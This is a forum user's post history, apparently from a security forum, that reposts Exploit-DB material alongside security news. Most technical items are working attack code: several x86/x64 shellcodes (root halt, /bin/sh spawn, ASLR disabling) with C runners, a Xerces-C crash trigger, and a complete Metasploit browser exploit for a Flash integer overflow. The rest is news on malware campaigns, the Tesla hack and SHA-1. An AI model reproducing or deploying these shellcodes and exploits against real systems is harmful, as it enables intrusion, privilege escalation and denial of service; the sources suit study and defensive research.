Aerosol

Everything posted by Aerosol

  1. linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes

/*
 +========================================================================================
 | # Exploit Title : linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes
 | # Exploit Author : Febriyanto Nugroho
 | # Tested on : Linux Debian 5.0.5
 +========================================================================================
*/
#include <stdio.h>
#include <string.h>

char s[] =
    "\x31\xc0\x31\xdb\x50\x53\x89\xe1"
    "\xb0\x46\xcd\x80\x31\xc0\x50\x68"
    "\x68\x61\x6c\x74\x68\x6e\x2f\x2f"
    "\x2f\x68\x2f\x73\x62\x69\x89\xe3"
    "\x50\x53\xb0\x0b\x89\xe1\xcd\x80"
    "\x31\xc0\x50\x89\xe3\xb0\x01\xcd"
    "\x80";

int main(int argc, char *argv[])
{
    printf("shellcode length -> %d bytes\n", (int)strlen(s));
    int (*fuck)() = (int (*)())s;   /* treat the byte buffer as a function */
    fuck();
    return 0;
}

Source
  2. Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes)

/*
#[+] Author: TUNISIAN CYBER
#[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes)
#[+] Date: 15-04-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp 32bit SP3
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Credits: steve hanna projectshellcode.com
=============================
Assembly:
;create.asm
[Section .text]
BITS 32
global _start
_start:
    jmp short GetCommand
CommandReturn:
    pop ebx
    xor eax,eax
    push eax
    push ebx
    mov ebx,0x7c8623ad
    call ebx
    xor eax,eax
    push eax
    mov ebx, 0x7c81cafa
    call ebx
GetCommand:
    call CommandReturn
    db "cmd.exe /C echo shellcode by tunisian cyber >file.txt"
    db 0x00
=============================
*/
char shellcode[] =
    "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff"
    "\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
    "\x65\x20\x2f\x43\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79"
    "\x20\x74\x75\x6e\x69\x73\x69\x61\x6e\x20\x63\x79\x62\x65\x72\x20\x3e\x66\x69\x6c\x65\x2e\x74\x78\x74\x00";

int main(int argc, char **argv)
{
    int (*f)();
    f = (int (*)())shellcode;   /* cast the buffer to a function pointer, not to a function type */
    (*f)();
    return 0;
}

Source
  3. Disable ASLR in Linux (less byte and more compact)

/*
#Title: Disable ASLR in Linux (less byte and more compact)
#Length: 84 bytes
#Date: 3 April 2015
#Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+)
#Tested On: kali-linux-1.0.6-i386
Thanks to stackoverflow

section .text
global _start
_start:
    jmp short fileaddress
shellcode:
    pop ebx
    xor eax,eax
    mov byte [ebx + 35],al
    push byte 5
    pop eax
    push byte 2
    pop ecx
    int 80h
    mov ebx, eax
    push byte 4
    pop eax
    jmp short output
cont:
    pop ecx
    push byte 2
    pop edx
    int 80h
    push byte 1
    pop eax
    xor ebx, ebx
    int 80h
fileaddress:
    call shellcode
    db '/proc/sys/kernel/randomize_va_spaceX'
output:
    call cont
    db '0',10
*/
char shellcode[] =
    "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
    "\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a"
    "\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70"
    "\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72"
    "\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63"
    "\x65\x58\xe8\xc5\xff\xff\xff\x30\x0a";

int main()
{
    int *ret;
    ret = (int *)&ret + 2;      /* point at main's saved return address */
    (*ret) = (int)shellcode;    /* returning from main jumps into the shellcode */
}

Source
  4. Developing MIPS Exploits to Hack Routers

     1. INTRODUCTION
     2. PREPARING LAB
        2.1. Running Debian MIPS on QEMU
        2.2. Cross Compiling for MIPS (bonus section)
     3. REVERSE ENGINEERING THE BINARY
        3.1. Obtaining The Target Binary
        3.2. Getting The Target Running
        3.3. Setting Up Remote Debugging
        3.4. Analysing The Vulnerability
     4. WRITING THE EXPLOIT
        4.1. Restrictions and Solutions
        4.2. Finding a Proper ROP Chain
        4.2. MIPS Shellcoding
           4.2.1 Writing Fork Shellcode
           4.2.1 Writing Unlink Shellcode (bonus section)
     5. CONCLUSION
     6. References

     Read more: https://www.exploit-db.com/docs/36806.pdf
  5. Privilege Escalation via Client Management Software (SySS GmbH | April 2015)

Security vulnerabilities in the Client Management Software FrontRange DSM can be leveraged in attacks against corporate networks.

Client management is a very important task in modern enterprise IT environments as all computer systems, whether client or server, should be managed throughout their entire system life cycle. There are many client management software solutions from different vendors that support IT managers and IT administrators in client management tasks like:
• inventory
• patch management
• software deployment
• license management

As a matter of principle, in order to perform these functions, client management software requires high privileges, usually administrative rights, on the managed client and server systems. Therefore, client management software is an interesting target for attackers as vulnerabilities in this kind of software may be leveraged for privilege escalation attacks within corporate networks.

During a penetration test of client and server systems of a corporate network, the SySS GmbH could find multiple security vulnerabilities in the client management software FrontRange Desktop & Server Management (DSM) v7.2.1.2020 [1] that could be successfully exploited in a privilege escalation attack resulting in administrative privileges for the entire Windows domain.

Security Assessment

During a security assessment of a client system managed with FrontRange DSM, the SySS GmbH found out that the client management solution FrontRange DSM stores and uses sensitive user credentials for required user accounts in an insecure manner which enables an attacker or malware with file system access to a managed client, for example with the privileges of a limited Windows domain user account, to recover the cleartext passwords.

The recovered passwords can be used for privilege escalation attacks and for gaining unauthorized access to other client and/or server systems within the corporate network as at least one FrontRange DSM user account needs local administrative privileges on managed systems.

FrontRange DSM stores passwords for different user accounts encrypted in two configuration files named NiCfgLcl.ncp and NiCfgSrv.ncp. These configuration files contain encrypted password information for different required FrontRange DSM user accounts (see [2]), for example:
• DSM Runtime Service
• DSM Distribution Service
• Business Logic Server (BLS) Authentication
• Database account

The actual number of required FrontRange DSM user accounts depends on the chosen security level during the software installation as Figure 1 illustrates.

A limited Windows domain user has read access to these configuration files that are usually stored in the following locations:
• %PROGRAMFILES(X86)%\NetInst\NiCfgLcl.ncp (local on a managed client)
• %PROGRAMFILES(X86)%\NetInst\NiCfgSrv.ncp (local on a managed client)
• \\<FRONTRANGE SERVER>\DSM$\NiCfgLcl.ncp (remote on a DSM network share)
• \\<FRONTRANGE SERVER>\DSM$\NiCfgSrv.ncp (remote on a DSM network share)

An analysis of the used encryption method by the SySS GmbH showed that the passwords are encoded and encrypted using a hard-coded secret (cryptographic key) contained within the FrontRange DSM executable file NiInst32.exe. Furthermore, the SySS GmbH found out that the process NiInst32.exe, which is executed in the context of a low-privileged user, decrypts and uses some of the user credentials contained in the FrontRange DSM configuration files. Thus, an attacker or malware running in the same low-privileged user context can analyze and control the process NiInst32.exe and in this way gain access to decrypted cleartext passwords.

For instance, such an online attack targeting the running process NiInst32.exe can be performed using an application-level debugger like OllyDbg [3] from the perspective of a limited Windows user. Figure 2 exemplarily shows the successful extraction of the decrypted cleartext password of the FrontRange DSM user account DSM Distribution Service. In order to gain ac

Read more: https://www.exploit-db.com/docs/36872.pdf
  6. linux/x86 exit(0) - 6 bytes

/*
 * linux/x86 exit(0) - 6 bytes
 * Febriyanto Nugroho
 */
#include <stdio.h>

char shellcode[] =
    "\xf7\xf0"
    "\xcd\x80"
    "\xeb\xfa";

int main(int argc, char **argv)
{
    asm("jmp %0;" : "=m" (shellcode));
}

Source
  7. Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)

/*
# Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 27 April 2015
#
# GPL
#
.global _start
_start:
    # char *const argv[]
    xorl %esi, %esi
    # 'h' 's' '/' '/' 'n' 'i' 'b' '/'
    movq $0x68732f2f6e69622f, %rbx
    # for '\x00'
    pushq %rsi
    pushq %rbx
    pushq %rsp
    # const char *filename
    popq %rdi
    # __NR_execve 59
    pushq $59
    popq %rax
    # char *const envp[]
    xorl %edx, %edx
    syscall
*/

/*
gcc -z execstack push64.c
uname -r
3.19.3-3-ARCH
*/

#include <stdio.h>
#include <string.h>

int main(void)
{
    char *shellcode =
        "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
        "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
    printf("strlen(shellcode)=%d\n", (int)strlen(shellcode));
    ((void (*)(void))shellcode)();   /* cast to a function pointer and call */
    return 0;
}

Linux x86 - Execve /bin/sh Shellcode Via Push (21 bytes)

/*
# Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 18 February 2015
#
# GPL
#
.global _start
_start:
    # char *const argv[]
    xorl %ecx, %ecx
    # 2 bytes, and both %eax and %edx were zeroed
    mull %ecx
    # __NR_execve 11
    movb $11, %al
    # for '\x00'
    pushl %ecx
    # 'h' 's' '/' '/'
    pushl $0x68732f2f
    # 'n' 'i' 'b' '/'
    pushl $0x6e69622f
    # const char *filename
    movl %esp, %ebx
    int $0x80
*/

/*
gcc -z execstack -m32 push.c
uname -r
3.19.3-3-ARCH
*/

#include <stdio.h>
#include <string.h>

int main(void)
{
    char *shellcode =
        "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
        "\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
    printf("strlen(shellcode)=%d\n", (int)strlen(shellcode));
    ((void (*)(void))shellcode)();   /* cast to a function pointer and call */
    return 0;
}
  8. Apache Xerces-C XML Parser (< 3.1.2) DoS POC

# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendor Homepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE : CVE-2015-0252

Apache Xerces-C XML Parser Crashes on Malformed Input

I believe this to be the same issue that was reported on CVE-2015-0252, posting this in case anyone is interested in reproducing it.

Original advisory: https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

$ printf "\xff\xfe\x00\x00\x3c" > file.xml
$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault
$ ./DOMPrint ./file.xml # ASAN Enabled build
=================================================================
==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798
READ of size 1 at 0xb5d9d87c thread T0
    #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719
    #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761
    #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576
    #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223
    #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385
    #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608
    #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244
    #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206
    #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
    #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
    #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
    #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
    #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
    #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)

0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c)
allocated by thread T0 here:
    #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)
    #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40
    #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68
    #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284
    #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198
    #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
    #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
    #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
    #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
    #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)

SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer()

Source
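The trigger in the post is a UTF-32LE byte-order mark followed by a single byte, so the body is shorter than one code unit of the encoding it announces. The following added example (not from the post or the Xerces project) is a pre-parse check that sniffs the BOM, rejects a body whose length is not a multiple of the code-unit size, and only then decodes; that an incomplete code unit is the exact path Xerces-C mishandles is an assumption, since the post only shows the crash.

```python
# Added example: validate raw XML bytes before they reach a parser.
# (BOM bytes, codec name, code-unit size). Longest prefixes come first so the
# 4-byte UTF-32LE BOM is not mistaken for UTF-16LE, whose BOM is its prefix.
BOMS = [
    (b"\x00\x00\xfe\xff", "utf-32-be", 4),
    (b"\xff\xfe\x00\x00", "utf-32-le", 4),
    (b"\xef\xbb\xbf", "utf-8", 1),
    (b"\xfe\xff", "utf-16-be", 2),
    (b"\xff\xfe", "utf-16-le", 2),
]

# The byte sequence from the post, reproduced here as constructed sample input.
POST_TRIGGER = b"\xff\xfe\x00\x00\x3c"


def sniff_encoding(data: bytes):
    """Return (codec, unit_size, bom_length) from the BOM; no BOM means UTF-8."""
    for bom, name, unit in BOMS:
        if data.startswith(bom):
            return name, unit, len(bom)
    return "utf-8", 1, 0


def check_xml_bytes(data: bytes) -> dict:
    """Reject inputs a transcoder cannot consume as whole code units."""
    name, unit, bom_len = sniff_encoding(data)
    body = data[bom_len:]
    result = {"encoding": name, "unit_size": unit, "body_len": len(body),
              "ok": True, "reason": ""}
    if not body:
        result.update(ok=False, reason="empty document after BOM")
        return result
    if len(body) % unit:
        # A trailing partial code unit: a transcoder that assumes whole units
        # would have to read past the end of the raw buffer to finish it.
        result.update(ok=False,
                      reason=f"{len(body)} bytes is not a multiple of "
                             f"{unit}-byte code units for {name}")
        return result
    try:
        text = body.decode(name)
    except UnicodeDecodeError as exc:
        result.update(ok=False, reason=f"undecodable {name}: {exc.reason}")
        return result
    if not text.lstrip().startswith("<"):
        result.update(ok=False, reason="document does not start with '<'")
    return result


if __name__ == "__main__":
    print(check_xml_bytes(POST_TRIGGER))
    print(check_xml_bytes(b"\xff\xfe\x00\x00" + "<a/>".encode("utf-32-le")))
```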
  9. Adobe Flash Player copyPixelsToByteArray Integer Overflow (Metasploit module)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
      'Description'    => %q{
        This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in
        the copyPixelsToByteArray method from the BitmapData object. The position field of the
        destination ByteArray can be used to cause an integer overflow and write contents out of
        the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
        IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Evans',  # Vulnerability discovery and 64 bit analysis / exploit
          'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
          'hdarwin',      # @hdarwin89, 32 bit public exploit, this msf module uses it
          'juan vazquez'  # msf module
        ],
      'References'     =>
        [
          ['CVE', '2014-0556'],
          ['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
          ['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
        ],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
          :arch    => ARCH_X86
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 23 2014',
      'DefaultTarget'  => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end

Source
  10. Core checker a defensive wrecker

Seculert CTO Aviv Raff says a nasty piece of malware linked to widespread destruction and bank account plundering has become more dangerous with the ability to evade popular sandboxes.

Raff says the Dyre malware ducks popular sandbox tools by detecting the number of cores in use. The known but effective and previously unused technique is enough to beat at least eight of the most widely used free and commercial kit, Raff says.

"If the machine has only one core it immediately terminates," Raff says in a post. "As many sandboxes are configured with only one processor with one core as a way to save resources, the check performed by Dyre is a good and effective way to avoid being analysed.

"On the other hand, most of the PCs in use today have more than one core."

Dyre is linked to a variant Dyre Wolf that IBM said last month plundered some $1 million from bank accounts.

Raff informed the affected sandbox developers of the evasion technique.

Dyre's Upatre downloader also sports new evasion techniques including a different user agent and grammatical fixes previously used to identify the malware.

Raff says the technique proves sandboxing should not be used in isolation to stamp out malware.

It is the latest development in a long history of cat-and-mouse warfare between malware writers and white hat defenders. Criminals need to contend with infiltrating victim machines while avoiding anti-virus and white hats who look for indicators that are hallmarks of a type of malware. Defenders meanwhile face malware that uses increasingly complex evasion techniques that are specifically honed to beat sandboxes, virtual machines and other tools.

Source
  11. Hi and welcome to RST! P.S.: nice introduction.
  12. Congratulations kronzy, don't cut anything from me anymore!
  13. Researchers with security firm Proofpoint have identified a sneaky social engineering-style operation in which attackers are submitting weaponized Microsoft Word documents – in lieu of actual résumés – to job postings listed on the CareerBuilder website.

On CareerBuilder, employers that post job openings will receive an email notification when an applicant submits a résumé, and the résumé is included as an attachment in the notification, according to a Wednesday post.

In this operation, the attackers are submitting malicious documents that exploit a memory corruption vulnerability in Word RTF, the post indicated. The documents are crafted using Microsoft Word Intruder (MWI), an underground crime service used to build weaponized documents typically meant for delivering malware.

Proofpoint observed a low volume of malicious documents being submitted for engineering and finance positions – such as business analyst, web developer and middleware developer – at stores, energy companies, broadcast companies, credit unions and electrical suppliers, according to the post.

“The attacks appear to be financially motivated; attackers are attempting to gain access to critical systems at companies that have access to wire-transferrable cash reserves and/or large volumes of information that's of value on the black market,” Kevin Epstein, VP of Advanced Security & Governance with Proofpoint, told SCMagazine.com in a Thursday email correspondence.

Upon opening the malicious Word document, code embedded by the attackers stealthily causes two seemingly innocuous files to download – a decompression app and what appears to be an image. If the image is opened by the decompression app, malware known as Sheldor begins running, Epstein said, explaining that the “combined delivery approach” helps with concealment.

Sheldor – which is packaged with legitimate remote assistance app TeamViewer in order to further prevent detection – provides a backdoor into computers, Epstein said.

“Once Sheldor is on your computer, attackers can use your computer in the background, without your knowledge,” he said. “They will have the same file and network access as you do, and can even log your keystrokes, activate your webcam, use your microphone, and so forth.”

Modern targeted attack protection and threat response systems are a must for online services that accept documents from unknown individuals on the internet, as well as for organizations that accept inbound emails with attachments and URLs, Epstein said.

CareerBuilder did not return a SCMagazine.com request for comment.

UPDATE: A CareerBuilder spokesperson told SCMagazine.com on Thursday, “CareerBuilder follows Incident Response protocols, investigating the scope and type of attack with the help of third party experts kept under contract, and sharing information with affected customers. CareerBuilder has controls in place to stop mass distribution of applications to job postings and takes a variety of preventative measures.”

Source
  14. Schizophrenic crims send Tesla claim calls to home of allegedly unconnected individual

The website and Twitter account of carmaker Tesla were hacked over the weekend, as part of what looks like a prank between rival hackers.

Elon Musk’s personal Twitter account was also hijacked on Saturday night (US time) by miscreants who at one point claimed to be from the infamous Lizard Squad hacking crew. The name Autismsquad was also used in some of the captured website defacements, a crudely done collage.

Hackers were able to temporarily seize control after Tesla had its DNS hacked and MX (mail) and other records changed. Twitter passwords were then reset, with instructions on how to change login credentials sent to accounts under the control of hackers.

It isn't clear how the DNS records were changed in the first place, but use of social engineering trickery to trick third parties into changing website names to IP address records has been a feature of similar hacks in the past.

@chf060 and @RooTworx, denied any connection with the breach, and said that miscreants had offered his home phone number as the number to call for the mythical free Tesla.

A good write-up of the attack as it unfolded can be found on the Transport Evolved blog here.

Lizard Squad are infamous for taking out XBox Live last Christmas in what turned out to be a promo for a short-lived DDoS-for-hire (AKA booter) cybercrime service.

Taking over a website put up by any organisation is the equivalent of scrawling graffiti on a poster put up by a firm. Websites are commonly hosted by third parties and breaking into them, while undesirable, ought not be confused with hacking into a corporate network.

Redirecting surfers to a website under hacker control is rather more serious, because this sort of thing can easily be used to spread malware. There's no evidence as yet of this taking place in the case of the Tesla Motors hack.

Losing control of email accounts is serious, however, because it can allow hackers to get their hands on confidential information. Such data can be either leaked with the idea of causing maximum embarrassment for the pwned organisation, or used as collateral for attempted extortion.

Security commentary on the implications of the attack can be found in a post on Bitdefender's Hot for Security blog.

Source
  15. Dropbox strikes back against Bartalex macro malware phishers

Dropbox has struck back against a hacker group using its cloud storage services to store and spread the Bartalex macro malware.

Trend Micro fraud analyst Christopher Talampas reported uncovering the campaign while investigating attacks targeting the Automated Clearing House (ACH) network used by many businesses for electronic funds transfers in the US on Tuesday.

A Dropbox spokesperson later told V3 that the firm is aware of the campaign and has already taken action against the hackers.

"We're aware of the issue and have already revoked the ability for accounts involved to share links since they've violated our Acceptable Use Policy," said the spokesperson.

"We act quickly in response to abuse reports submitted to abuse@dropbox.com, and are constantly improving how we detect and prevent Dropbox users from sharing spam, malware or phishing links."

The use of Dropbox links containing the Bartalex macro malware reportedly makes the campaign particularly dangerous.

"Instead of attachments, the message this time bore a link to ‘view the full details'. By hovering over the URL we can see that it redirects to a Dropbox link with a file name related to the supposed ACH transaction," read Trend Micro in an advisory.

"The URL leads to a Dropbox page that contains specific instructions (and an almost convincing) Microsoft Office warning that instructs users to enable the macros.

"Upon enabling the macro, the malicious document then triggers the download of the banking malware."

Trend Micro reported uncovering at least 1,000 malicious Dropbox links hosting the malware during the campaign's peak.

It is unclear how successful the campaign has been, although Trend Micro said that the malware has been used to target big name financial institutions including JP Morgan.

Trend Micro cited the use of macro malware as a sign that criminals are rehashing old tricks in a bid to get round more modern system defences.

"Macro malware like Bartalex is seemingly more prominent than ever, which is an indicator that old threats are still effective infection vectors on systems today," read the advisory.

"And they seem to be adapting: they are now being hosted in legitimate services like Dropbox and, with the recent outbreak, macro malware may continue to threaten more businesses in the future."

Macro malware is a threat that afflicted older versions of Windows. Microsoft ended the threat with Office XP in 2001 when it tweaked its systems to request user permission before executing macro scripts in embedded files.

Macros are code scripts containing commands for automating tasks that are used in numerous applications.

The discovery follows a reported boom in phishing levels. Research from Verizon earlier in April showed that a staggering one in four phishing scams currently result in success.

Source
  16. The road towards phasing out the ageing SHA-1 crypto hash function is likely to be littered with potholes, security experts warn.

SHA-1 is a hashing (one-way) function that converts information into a shortened "message digest", from which it is impossible to recover the original information. This hashing technique is used in digital signatures, verifying that the contents of software downloads have not been tampered with, and many other cryptographic applications.

The ageing SHA-1 protocol – published in 1995 – is showing its age and is no longer safe from Collision Attacks, a situation where two different blocks of input data throw up the same output hash. This is terminal for a hashing protocol, because it paves the way for hackers to offer manipulated content that carries the same hash value as pukka packets of data.

Certificate bodies and others are beginning to move on from SHA-1 to its replacement, SHA-2. Microsoft announced its intent to deprecate SHA-1 in Nov 2013. More recently, Google joined the push with a decision to make changes in the latest version of its browser, Chrome version 42, so that SHA-1 certificates are flagged up as potentially insecure.

Nudge

Ken Munro, a director at security consultancy Pen Test Partners, warned that this type of behaviour creates the danger that while SHA-2 is being phased in, trust in certificates will suffer.

"The risk of not updating could see users learn not to trust your site (reduced custom) or could encourage them to accept less-than-perfect encryption or even invalid certificates," Munro explained.

Just updating to SHA-2 is not as simple as it might seem, because of compatibility issues with Android and Windows XP. More specifically, Android before 2.3 and XP before SP3 are incompatible with the change (a fuller compatibility matrix maintained by digital certificate firm GlobalSign can be found here). Windows XP may have been put out to pasture last year, but it's still widely used.

Older versions of Android also present a problem. Around one per cent of devices used for Google Play are still <2.3 (Froyo) or below. Whilst the current Play Store version doesn't work pre 2.2, that still indicates that around 20 million active devices are in use that aren’t compatible with SHA-2, according to Munro.

"The fact that SHA-2 can’t be used with older browsers and OS’s means that untrusted certificate warnings are going to become commonplace," Munro explained. "And if that happens, the danger is that many users will simply ride rough-shod over such pop-ups, potentially creating the ideal opportunity for man-in-the-middle (MitM) attacks."

Ivan Ristic, a software engineer and founder of SSL Labs, agreed with Munro that there might be some trouble with the phasing out of SHA-1, "as with all older technologies".

"Websites with older audiences might consider deploying with dual certificates; older SHA-1 for older clients and newer SHA-2 for modern clients," Ristic told El Reg. "Not all web servers support this, however."

"To prevent warnings in Chrome, sites must upgrade to SHA-2 by the end of this year. However, it's possible to continue to use SHA-1 certificates at least until the end of 2016. So this gives sites at least about 1.5 years."

Baseline requirements from industry group the CA/Browser Forum (PDF) offer "room for a reasonably safe dual-cert deployment" for even longer, if really necessary, up until the start of 2017.

Macro signing

Browser compatibility is not the only issue. SHA-2 compatibility for macro signing isn’t great, according to Munro, who said "it simply doesn’t work for Office 2003/2007 macro signing". Office 2010 does support SHA-2 macro signing, but only with a hotfix.

Munro added: "There are plenty of other systems out there that are unlikely to ever accept SHA-2: what about the web interfaces for SCADA and other industrial control systems? What about other highly customised environments in the military: fire control systems built on old hardened versions of Windows XP?"

Microsoft made some changes/exceptions for code signing, according to Ristic.

Bootnote

Microsoft's IE will allow "CAs to continue to issue SSL and code signing certificates until January 1 2016, and thereafter issue SHA-2 certificates only”. Google's Chrome will handle sites with end-entity (“leaf”) certificates that expire on or after 1 January 2017, and which include an SHA-1-based signature as part of the certificate chain, as “secure, but with minor errors”. Mozilla, makers of Firefox, has developed a policy that SHA-1 certificates should not be issued after January 1 2016, nor trusted after January 1 2017.

Source
